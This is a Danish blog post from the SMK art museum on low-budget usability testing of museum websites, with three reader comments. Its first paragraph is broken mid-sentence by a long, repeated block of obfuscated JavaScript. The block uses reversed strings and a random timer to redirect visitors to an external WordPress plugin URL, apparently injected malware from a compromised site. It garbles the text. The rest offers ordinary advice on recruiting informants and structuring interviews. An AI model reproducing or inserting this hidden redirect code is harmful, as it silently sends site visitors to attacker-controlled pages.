Usability – for os uden penge

Har du talt med dine brugere om din hjemmeside? I forlængelse af Jørgen Buchardts indlæg for nylig på bloggen, vil jeg fortælle, hvordan vi på SMK laver usability-undersøgelser uden at bruge andet end vores egen arbejdstid.
Jeg har nu en del gange gennemført lav-praktiske brugervenlighedsundersøgelser og fået rigtig, rigtig stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tort udbytte af det. Det kan virkelig anbefales – ikke mindst hvis I er på vej til at relancere jeres website.

Men, hvordan rent praktisk?

Jeg har både været ude i at rekruttere veninders fastre og venners, venners kusiner til undersøgelserne, men har også taget fat i de brugere, der er på siden. Når brugere, der typisk har skrevet til mig på grund af problemer på hjemmesiden, får svar fra mig – spørger jeg altid, om jeg må kontakte dem en anden gang, hvis vi får brug for at forbedre hjemmesiden. Det må jeg ind i mellem, og det giver gode og engagerede informanter (– men man kan jo også spørge gæster på museet, hvis ikke man har tænkt sig at bruge hele deres eftermiddag).

Fem interviews er ifølge Jakob Nielsen tilpas til at få identificeret nøgleproblemerne på websiden.

Vi har skruet vores undersøgelser forskelligt sammen alt efter formål/målgruppe, men en klassisk model er at starte med baggrundsspørgsmål for at forstå brugerens tilgang, fx internet- og museumsvaner. Dernæst kigger vi på det aktuelle site og taler om førstehåndsindtryk af forsiden i forhold til stil, design, sprog, billedvalg, farver, etc. Man kan også vælge at stille spørgsmål til strukturering af informationer, navigation, etc.

Herefter er det tid til at løse nogle konkrete opgaver – og mange kan sikkert med fordel gå direkte til denne type spørgsmål, hvis tiden er knap – for enhver hjemmeside har formål og primære informationer, som brugerne jo helst skal kunne finde. Fx var jeg meget interesseret i at høre, hvordan en bruger ville finde ud af, hvad det koster at se den aktuelle særudstilling, og om SMK har guldalderkunst i samlingerne. Allersidst kan man runde af med anden eller måske snarere tredjehåndsindtryk af siden. Hvad har generelt gjort indtryk, forvirret, generet, overrasket eller været positivt, og har informanten forslag til forbedringer.
Jeg har fået hjælp af praktikanter og studentermedarbejdere til gennemføre undersøgelser, og det har været rigtig godt til de undersøgelser, hvor jeg selv er for velbevandret i siden til at kunne agere neutralt. Vi har optaget undersøgelserne – så alle der skal høre resultaterne kan komme til det. Jeg har hentet inspiration til undersøgelserne fra blandt andet denne side

Selvfølgelig ville det være fedt, hvis man både kunne få skærmadfærden dokumenteret, lave eyetracking og have professionelle bureauer til at klare det hele. Men sådan er virkeligheden jo bare ikke i museumsverdenen pt.

Eller hvad siger I derude?

3 comments to “Usability – for os uden penge”
  1. Hej Anne!

    Hvor er det godt, når man går og skal opfinde et nyt site, at få de lavpraktiske muligheder. Mht eyetracking osv, er der jo bureauer der laver det, som måske kunne formås til at give en indføring for en gruppe af museer, hvis alternativet var ikke at få nogen kunder i branchen overhovedet…

  2. Hej Mikkel,

    Du har da helt ret. Måske vi skulle forsøge at få nogle usability-bureauer på banen i netværkets regi – om ikke andet så med inspirationsoplæg? Jeg kender et par stykker, man kontakte, hvis I kender nogle gode, så sig til.

    Jeg kom også til at tænke på, at der sikkert er studerende fx på ITU og DTU der arbejder med de teknologier, som vil kunne bruge museumscases som prøvekaniner.

  3. ja- enklar idé med studerende. Vi har på Brede Værk en “sandkasse”, hvor der p.t. er 4 ITU-studrende, der arbejder med konceptudvikling, teknologiresearch og brugerundersøgelse. De kan anbefales, hvis man har en tovholderfunktion.

Skriv et svar